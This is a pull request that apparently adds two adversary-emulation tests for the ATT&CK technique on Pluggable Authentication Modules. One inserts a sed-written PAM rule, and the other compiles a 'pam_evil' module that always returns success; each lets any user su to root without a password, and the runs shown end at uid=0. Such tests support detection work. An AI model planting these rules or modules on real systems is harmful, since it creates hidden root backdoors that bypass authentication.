### PR TITLE
T1556.003 Pluggable Authentication Modules

### DIFF
--- a/atomics/T1556.003/T1556.003.yaml
+++ b/atomics/T1556.003/T1556.003.yaml
@@ -1,0 +1,82 @@
+attack_technique: T1556.003
+display_name: 'Modify Authentication Process: Pluggable Authentication Modules'
+atomic_tests:
+- name: Malicious PAM rule
+  description: |
+    Inserts a rule into a PAM config and then tests it.
+    
+    Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+  supported_platforms:
+  - linux
+  input_arguments:
+    path_to_pam_conf:
+      description: PAM config file to modify.
+      type: string
+      default: /etc/pam.d/su-l
+    pam_rule:
+      description: Rule to add to the PAM config.
+      type: string
+      default: auth sufficient pam_succeed_if.so uid >= 0
+    index:
+      description: Index where the rule is inserted.
+      type: integer
+      default: 1
+    test_command:
+      description: Command used to test the PAM config.
+      type: string
+      default: echo "id" | su -l
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+      #{test_command}
+    cleanup_command: |
+      sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+- name: Malicious PAM module
+  description: |
+    Creates a PAM module, inserts a rule to use it, and then tests it.
+
+    Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+  supported_platforms:
+  - linux
+  input_arguments:
+    path_to_pam_conf:
+      description: PAM config file to modify.
+      type: string
+      default: /etc/pam.d/su-l
+    pam_rule:
+      description: Rule to add to the PAM config.
+      type: string
+      default: auth sufficient /tmp/pam_evil.so
+    index:
+      description: Index where the rule is inserted.
+      type: integer
+      default: 1
+    test_command:
+      description: Command used to test the PAM config.
+      type: string
+      default: echo "id" | su -l
+    path_to_pam_module_source:
+      description: Path to PAM module source code.
+      type: path
+      default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+    path_to_pam_module:
+      description: Path to PAM module object
+      type: path
+      default: /tmp/pam_evil.so
+  dependencies:
+  - description: |
+      The PAM module must exist on disk at specified location (#{path_to_pam_module})
+    prereq_command: |
+      if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+      #{test_command}
+    cleanup_command: |
+      sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

--- a/atomics/T1556.003/src/pam_evil.c
+++ b/atomics/T1556.003/src/pam_evil.c
@@ -1,0 +1,9 @@
+#include <security/pam_modules.h>
+
+PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
+    return PAM_SUCCESS;
+}
+
+PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,int argc, const char **argv) {
+    return PAM_SUCCESS;
+}


### PR DESCRIPTION
**Details:**
This PR adds 2 tests that modify the PAM authentication process.
Test 1 creates a rule that directly changes authentication flow.
Test 2 creates a module that handles the authentication flow.

**Testing:**
Ubuntu 20.04
```
PS /projects> Invoke-AtomicTest T1556.003 -TestNumber 1
PathToAtomicsFolder = /projects/AtomicRedTeam/atomics

Executing test: T1556.003-1 Malicious PAM rule
Done executing test: T1556.003-1 Malicious PAM rule
uid=0(root) gid=0(root) groups=0(root)
PS /projects> Invoke-AtomicTest T1556.003 -TestNumber 1 -Cleanup
PathToAtomicsFolder = /projects/AtomicRedTeam/atomics

Executing cleanup for test: T1556.003-1 Malicious PAM rule
Done executing cleanup for test: T1556.003-1 Malicious PAM rule
PS /projects> Invoke-AtomicTest T1556.003 -TestNumber 2 -GetPrereqs
PathToAtomicsFolder = /projects/AtomicRedTeam/atomics

GetPrereq's for: T1556.003-2 Malicious PAM module
Elevation required but not provided
Attempting to satisfy prereq: The PAM module must exist on disk at specified location (/tmp/pam_evil.so)
Prereq successfully met: The PAM module must exist on disk at specified location (/tmp/pam_evil.so)
PS /projects> Invoke-AtomicTest T1556.003  -TestNumber 2
PathToAtomicsFolder = /projects/AtomicRedTeam/atomics

Executing test: T1556.003-2 Malicious PAM module
Done executing test: T1556.003-2 Malicious PAM module
uid=0(root) gid=0(root) groups=0(root)
PS /projects> Invoke-AtomicTest T1556.003 -TestNumber 2 -Cleanup
PathToAtomicsFolder = /projects/AtomicRedTeam/atomics

Executing cleanup for test: T1556.003-2 Malicious PAM module
Done executing cleanup for test: T1556.003-2 Malicious PAM module
```

**Associated Issues:**
n/a